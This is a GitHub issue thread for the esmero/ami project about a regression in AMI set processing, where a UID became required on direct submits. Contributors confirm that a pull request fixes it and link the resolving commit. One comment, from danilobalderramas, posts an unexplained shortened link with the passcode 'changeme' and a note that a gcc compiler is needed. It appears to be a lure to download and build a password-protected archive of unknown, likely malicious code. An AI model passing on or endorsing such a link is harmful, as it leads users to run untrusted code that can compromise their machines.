### ISSUE TITLE
Regression introduced on AMI set processing UID loader

### ISSUE THREAD

**Issue by DiegoPino** [esmero/ami#217]
# What?

CSV AMI Queue added a challenge, which is the AMI set needs to run as the user submitting to the queue. That was fixed by #215 and #216 but that introduced now the need to also have on a Direct submit the UID present.

**Comment by danilobalderramas** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by patdunlavey** [comment]
Confirmed that #218 resolves this problem:

1. Immediate processing of AMI set works
2. Delete processed ADOs works
3. Enqueued csv expansion and ADO processing still works.

**Comment by DiegoPino** [comment]
@patdunlavey thanks a lot!

**Comment by patdunlavey** [comment]
Thank YOU!!!

**Comment by patdunlavey** [comment]
@DiegoPino  Do you need a PR for 0.9.0?

**Comment by DiegoPino** [comment]
Yes i do, will be there in a few, need to rebase some stuff

**Comment by DiegoPino** [comment]
resolved via https://github.com/esmero/ami/commit/cf70fd955d63434ba0906ef32817f8eb48e81967
